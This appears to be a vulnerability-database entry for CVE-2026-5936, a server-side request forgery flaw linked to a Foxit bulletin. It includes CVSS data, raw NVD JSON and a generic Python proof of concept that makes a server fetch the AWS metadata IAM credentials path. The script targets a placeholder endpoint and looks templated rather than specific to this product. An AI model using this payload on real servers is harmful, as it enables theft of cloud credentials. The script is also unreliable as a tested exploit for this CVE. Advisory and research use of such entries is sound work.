CVE-2026-5936

Description

An attacker can control a server-side HTTP request by supplying a crafted URL, causing the server to initiate requests to arbitrary destinations. This behavior may be exploited to probe internal network services, access otherwise unreachable endpoints (e.g., cloud metadata services), or bypass network access controls, potentially leading to sensitive information disclosure and further compromise of the internal environment.

CVSS Details

CVSS Score

8.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N

Configurations (Affected Products)

No configuration data available.

未在提供信息中披露

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def exploit_ssrf(target_url, malicious_url):
    """
    PoC for CVE-2026-5936
    This script sends a crafted URL to the vulnerable endpoint to trigger an SSRF.
    """
    # Example payload targeting internal metadata service
    payload = {
        "url": malicious_url
    }
    
    try:
        print(f"[*] Sending request to {target_url} with payload: {malicious_url}")
        response = requests.post(target_url, data=payload, timeout=5)
        
        if response.status_code == 200:
            print("[+] Request successful!")
            print("[+] Response content:")
            print(response.text)
        else:
            print(f"[-] Server returned status code: {response.status_code}")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    # Replace with the actual vulnerable endpoint
    target = "http://vulnerable-site.com/api/fetch"
    # Common internal metadata service IP (AWS)
    internal_target = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
    exploit_ssrf(target, internal_target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-5936
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-5936
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-5936/
[4] VulDB https://vuldb.com/cve/CVE-2026-5936
[5] https://www.foxit.com/support/security-bulletins.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-5936", "sourceIdentifier": "14984358-7092-470d-8f34-ade47a7658a2", "published": "2026-04-13T07:16:50.710", "lastModified": "2026-04-13T15:01:43.663", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "An attacker can control a server-side HTTP request by supplying a crafted URL, causing the server to initiate requests to arbitrary destinations. This behavior may be exploited to probe internal network services, access otherwise unreachable endpoints (e.g., cloud metadata services), or bypass network access controls, potentially leading to sensitive information disclosure and further compromise of the internal environment."}], "metrics": {"cvssMetricV31": [{"source": "14984358-7092-470d-8f34-ade47a7658a2", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 4.7}]}, "weaknesses": [{"source": "14984358-7092-470d-8f34-ade47a7658a2", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://www.foxit.com/support/security-bulletins.html", "source": "14984358-7092-470d-8f34-ade47a7658a2"}]}}